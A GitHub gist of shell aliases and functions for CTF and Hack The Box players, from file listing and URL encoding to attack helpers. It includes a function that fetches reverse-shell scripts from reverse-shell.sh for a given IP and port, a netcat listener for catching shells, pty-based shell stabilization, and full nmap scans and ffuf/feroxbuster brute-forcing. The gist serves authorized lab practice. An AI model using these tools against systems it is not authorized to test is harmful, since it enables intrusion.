Skip to content

Instantly share code, notes, and snippets.

@kavishkagihan
Last active February 16, 2023 18:03
Show Gist options
  • Save kavishkagihan/d3a246943087634dafd1fab24aff8d24 to your computer and use it in GitHub Desktop.
Save kavishkagihan/d3a246943087634dafd1fab24aff8d24 to your computer and use it in GitHub Desktop.
Useful aliases for CTF players #aliases #bash #zsh #linux #CTF #Hackthebox
  • To easily list files giving more information - ll
alias ll='ls -alhF'
  • First, install xclip in your system. This will let you copy output of a command directly to your clipboard. - cat file.txt|c
alias c='xclip -selection clipboard'
  • Change the prompt of your shell. Helps you to keep classify and recognize your terminal windows effectively. You can change colors according to your preference - p dev01>
p() {
	PS1="%B%F{green}➜  %B%F{#03fcd0}% $1 %{$reset_color%}"
}
  • Startup python SimpleHTTPServer - server 8081. Here if you want to start the server in a specific directory, you can pass the dir as an argument - server 9090 /tmp/
server() {
        if [[ $2 ]];then
                python3 -m http.server $1 --directory $2
        else
                python3 -m http.server $1
        fi
}
  • Generate a script with reverse shells to use. - rs 10.10.14.28 9001 > shell.sh
rs() {
	curl https://reverse-shell.sh/$1:$2
}
  • Connect to a VPN - vpn-up
vpn-up() {
	sudo pkill openvpn
	sudo openvpn /home/kavi/Documents/HTB/lab_kavigihan.ovpn
}
  • Setup the env. (For HTB players). This will make a directory named after a name you specify and start a webserver in /opt/drop directory. You can put your pspy,linpeas.sh like files there. PID of the server is saved in /home/kavi/Documents/HTB/$1/.server.pid incase you want to kill the server - htb-init Moderators
htb-init() {
	if [[ $1 ]]; then			
		mkdir -p /home/kavi/Documents/HTB/$1/files
		mkdir -p /home/kavi/Documents/HTB/$1/exploits
		cd /opt/drop
		/usr/bin/python3 -m http.server 8080 > /dev/null 2>&1 &
		echo $! > /home/kavi/Documents/HTB/$1/.server.pid
		cd /home/kavi/Documents/HTB/$1
		clear
	else
		echo 'Usage: htb-init Moderators'
	fi
}
  • Doing a full nmap. nmap-full 10.10.11.169
nmap-full() {
	nmap -p- -sC -sV -A --min-rate=400 --min-parallelism=512 -vv $1
}
  • Run ffuf for direcotry busting - ffuf-dir http://site.com/FUZZ. If you want to specify extensions of any other option you can pass them after the URL (ffuf-dir URL -e php -fl 100)
ffuf-dir() {
        ffuf -u $1 -w /usr/share/wordlists/dirb/big.txt ${@: 2};
}
  • Run ffuf for vhost fuzzing - ffuf-vhost domain.local
ffuf-vhost() {
        ffuf -H "Host: FUZZ.$1" -u http://$1 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt ${@: 2};
}
  • Start feroxbuster for directory brutforcing - fx http://10.10.11.169 ${@: 2};
fx() {
	feroxbuster -u $1 -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
}
  • Start a listener. This is specially for zsh users(specially oh-my-zsh).By default this will start the listener in port 9090, or you could speficy the port you need. lst 9001
lst() {

	if [[ $1 ]]; then
		bash --login -c "nc -lvnp $1"
	else
		bash --login -c "nc -lvnp 9090"
	fi
}
  • Stabilize the shell. This can be used in combination with the above listener.
st() {
    if [[ $1 -eq 1 ]]; then 
        printf "python -c 'import pty;pty.spawn(\"/bin/bash\")'\nexport TERM=alacritty\n"|c

    elif [[ $1 -eq 2 ]]; then
        printf "python3 -c 'import pty;pty.spawn(\"/bin/bash\")'\nexport TERM=alacritty\n"|c
    else
        printf 'script -q /dev/null -c /bin/bash\nexport TERM=alacritty\n'|c
    fi
    echo "Stablizing commands copied to the clipboard!"
    stty raw -echo;fg
}

I.e once you get a conntection to your listener, you can background it with Ctrl+z and then issue st to copy the stabilizing commands to your clipboard (Here c alias mentioned above is also used). Then this will isse the stty raw -echo;fg command for you. Then you just have to paste the copied commands and press enter. And now you have a fully stabalized shell!

Another nice automated solution for stabilizing your reverse shell which works for both bash and zsh can be found here

  • Url encode a string - echo asd==|urlencode
urlencode() {
        python3 -c "import sys; from urllib.parse import quote; print(quote(sys.stdin.read().strip()));"
}
  • URL decode a string - echo 123%3D%3D|urldecode
urldecode() {
        python3 -c "import sys; from urllib.parse import unquote; print(unquote(sys.stdin.read().strip()));"
}
  • Get the MD5 hash of a string - echo kavi|md5
md5() {
        python3 -c 'import hashlib,sys; print(hashlib.md5(sys.stdin.read().encode()).hexdigest())'
}
  • Followings are for tmux users. This will allow you to quickly add notes to the status bar of your tmux session. I.e when you find a user password which you will be using a lot, you can add it here, instead of keeping that in the clipboard or noting it down in a file. - tsa 'admin:pa$$10rd' - this will add the note. tsd - will clear the status bar
tsa() {
	status_bar=$(cat $TMUX_SATUS_BAR)
	tmux set-option -g status-right "$1 $status_bar"
	echo "| $1 $status_bar" > $TMUX_SATUS_BAR
}

tsd() {
	echo '[#{session_name}]' > $TMUX_SATUS_BAR
	status_bar=$(cat $TMUX_SATUS_BAR)
	tmux set-option -g status-right "$status_bar"
}

NOTE: For this to work you need to have a variable called TMUX_SATUS_BARpointing to a file which contains the current config for your the right sude if your status bar. For me its [#{session_name}]. For more information, take a look at my .zshrc

@kavishkagihan
Copy link
Author

If you have any other suggestions, let me know!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment